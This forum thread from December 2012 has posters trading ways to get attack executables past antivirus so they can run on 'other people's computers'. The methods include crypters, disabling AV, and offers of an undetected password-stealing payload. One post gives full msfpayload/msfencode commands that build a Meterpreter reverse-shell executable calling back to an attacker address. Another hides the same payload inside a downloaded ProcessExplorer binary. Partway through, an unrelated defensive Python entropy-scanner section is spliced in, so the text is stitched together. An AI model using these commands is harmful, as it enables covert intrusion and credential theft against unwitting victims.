overwraith Posted December 9, 2012
I was thinking it would be really awesome if we could reuse some of the executables from the USB Hacksaw and Switchblade. Does anyone know of any good (but free) program executable obfuscation software?
Goddish Posted December 10, 2012
overwraith Posted December 10, 2012 (edited)
Some of the problems with some of the tools though was that they were always picked up by antivirus. What I am asking is if there is a program that transforms the executables, making them hard for the antivirus to discover. Obfuscation uses different tactics to make code hard to reverse engineer, and by extension hard to match to heuristics and virus databases.
Edited December 10, 2012 by overwraith
Goddish Posted December 10, 2012 (edited)
You could disable or uninstall their AV with the duck (maybe stop the services?). I don't know a whole lot about this, but you could pack the files too.
http://www.ehow.com/...es-windows.html
http://wiki.answers.com/Q/How_to_shut_down_avg_antivirus
It kinda really depends on which antivirus you wanna work around.
Edited December 10, 2012 by Goddish
overwraith Posted December 10, 2012
Yeah, but the point is to make code that can be executed on other people's computers, you know, "hacking".
Goddish Posted December 10, 2012
> Yeah, but the point is to make code that can be executed on other people's computers, you know, "hacking".

If you know of a method of grabbing passwords in C# or VB.NET that doesn't set off AVs, PM me and we'll get to work.
Goddish Posted December 10, 2012 (edited)
I think I may have found a way to make it undetected. I'll be working on a release for tomorrow evening: a password payload that isn't detected and doesn't use NirSoft...
Edited December 10, 2012 by Goddish
overwraith Posted December 10, 2012
But do you know what obfuscation is in relation to EXEs? It actually takes advantage of things like fake conditional branches to confuse reverse engineers and to change the appearance of the executable to the antivirus programs.
bingowings85 Posted December 10, 2012
Add an exception in the AV software to ignore that file/folder.
overwraith Posted December 14, 2012
Everybody! The point of this is not to make an exception in the antivirus program; the point is to run the executables through a program that skews the code in such a way that it makes the code hard to recognize by antivirus. I was simply asking if anyone knew of any programs that do this. I know they exist. Virus writers use setups that can create thousands of different compilations of their code, all slightly different.
Goddish Posted December 14, 2012
They are called crypters and there are thousands of them. All the good ones cost money; they get patched daily by AVs, and you have to pay for an updating subscription to a good, not well-known crypter. If you know someone who has one, you can give them your stub and get them to crypt it for you. Unless you know how to write a program to pack files yourself, that's your best option.
Sud0x3 Posted December 14, 2012 (edited)
You will find that questions along these lines do not get answered, the reason being that there are many ways to do this and it is relatively easy when you know what you're doing. I'll give you a hint: Metasploit is capable of doing what you're asking.
Edited December 14, 2012 by Sud0x3
overwraith Posted December 14, 2012
Ok, thanks, I will get a Metasploit book.
Sud0x3 Posted December 14, 2012
> Ok, thanks, I will get a Metasploit book.

Here's some reading material to get you started :)
http://schierlm.users.sourceforge.net/avevasion.html
http://adaywithtape.blogspot.nl/2010/05/creating-backdoored-exe-with-metasploit.html
CaptainHooligan Posted December 14, 2012
Why not just use msfencode?
no42 Posted December 15, 2012
msfencode is slightly outdated; msfvenom is newer (and combines msfpayload and msfencode). But typically, decent AVs detect all Metasploit code.
Xcellerator Posted December 15, 2012
AVs do not detect Metasploit code. If you're making binaries, they detect the stagers (the EXEs that carry the initial code). Try it for yourself: lower your AV, run a Meterpreter binary, make sure the shell is open, then restart your AV. What do you see? The binary gets quarantined, but the Meterpreter code itself runs in memory and isn't detected. Using a custom EXE template is usually your best bet, or even better, a custom EXE with a lesser-used payload (windows_add_user), or learn shellcode and write your own.
CaptainHooligan Posted December 16, 2012
I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:
[CODE]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload.exe
[/CODE]
That sometimes still gets caught, which is when I use a custom template, which isn't too hard to do. Any Windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on, and Sysinternals has a free download. All you need to do to run that is:
[CODE]
wget http://download.sysinternals.com/Files/ProcessExplorer.zip
unzip ProcessExplorer.zip
# procexp.exe is the ProcessExplorer executable from the zip
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe -o payload.exe -e x86/shikata_ga_nai -c 5
[/CODE]
As was mentioned in previous posts, msfvenom is more up to date than msfencode, but when using a custom template (any Windows executable) there is usually no problem at all bypassing AV.
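From the defender's side, the encoder chains, crypters and packers discussed in this thread all share one statistical tell: the bulk of the resulting file is data that looks close to random, which ordinary compiled code does not. Measuring Shannon entropy over fixed-size windows of a file is a standard triage heuristic for spotting that. The script below is an added example, not code from this thread or from Metasploit; the window size, the 7.0 bits-per-byte threshold and the sample inputs (a constructed text blob standing in for plain code, and a deterministic SHA-256 counter stream standing in for an encoded payload body) are all assumptions.

```python
"""Entropy heuristic for flagging packed or encoded regions in a binary.

Added example (not from the thread). Windows of bytes whose entropy is
close to 8 bits/byte usually hold compressed, encrypted or encoded data;
plain x86 code and text sit well below that. WINDOW and THRESHOLD are
assumptions chosen for illustration, not tuned values.
"""
import hashlib
import math
from collections import Counter
from typing import List, Tuple

WINDOW = 1024      # bytes per window (assumption)
THRESHOLD = 7.0    # bits/byte; random data ~7.8+ at this window size (assumption)


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte over `data`; 0.0 for empty input."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = WINDOW,
                         threshold: float = THRESHOLD) -> List[Tuple[int, float]]:
    """Return (offset, entropy) for every window whose entropy exceeds `threshold`.

    A trailing fragment shorter than half a window is skipped, because the
    plug-in entropy estimate is unreliable on very small samples.
    """
    hits = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if len(chunk) < window // 2:
            continue
        e = shannon_entropy(chunk)
        if e > threshold:
            hits.append((off, e))
    return hits


def packed_ratio(data: bytes, window: int = WINDOW,
                 threshold: float = THRESHOLD) -> float:
    """Fraction of windows flagged; a large fraction suggests an encoded/packed body."""
    total = max(1, math.ceil(len(data) / window))
    return len(high_entropy_windows(data, window, threshold)) / total


def scan_file(path: str) -> Tuple[float, List[Tuple[int, float]]]:
    """Scan a file on disk and return (packed_ratio, flagged windows)."""
    with open(path, "rb") as fh:
        data = fh.read()
    return packed_ratio(data), high_entropy_windows(data)


# Constructed sample input (assumption): 2048 bytes of text standing in for
# ordinary code, followed by 4096 bytes of pseudo-random data standing in for
# an encoded payload body appended to a template executable.
LOW_PART = (b"push ebp; mov ebp, esp; sub esp, 0x40; call helper; leave; ret\n" * 64)[:2048]
HIGH_PART = b"".join(hashlib.sha256(i.to_bytes(4, "little")).digest() for i in range(128))
SAMPLE = LOW_PART + HIGH_PART


def demo() -> List[int]:
    """Offsets of the flagged windows in the constructed sample."""
    hits = high_entropy_windows(SAMPLE)
    for off, e in hits:
        print(f"offset 0x{off:06x}: {e:.2f} bits/byte")
    print(f"packed ratio: {packed_ratio(SAMPLE):.2f}")
    return [off for off, _ in hits]


if __name__ == "__main__":
    demo()
```

On the constructed sample only the four windows covering the pseudo-random tail are flagged, giving a packed ratio of about 0.67. Treat this as a triage signal rather than a verdict: installers, compressed resources and legitimately packed software (UPX and similar) raise the same flag, so in practice the ratio is combined with other signals such as section names, import table size and whether the entry point lies in a high-entropy region.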
Xcellerator Posted December 17, 2012
What CaptainHooligan says above is right: most AVs get thrown by a custom template. Some of the tougher ones (like Avast or AVG) can still pick them up.
--nick-- Posted December 28, 2012
Is there a link to a guide on making a custom .exe? I'd like to take a look.
Xcellerator Posted December 29, 2012
The idea isn't to make a custom EXE, but to USE one. If you want to MAKE a custom EXE, fire up Notepad++ and your favourite compiler and get coding. If you want to USE a custom EXE (i.e. not the default one bundled with Metasploit), then you can use the '-x' option with 'msfvenom'. There are other ways, but I find that to be the easiest. Just remember to spawn a listener in Metasploit if you need one!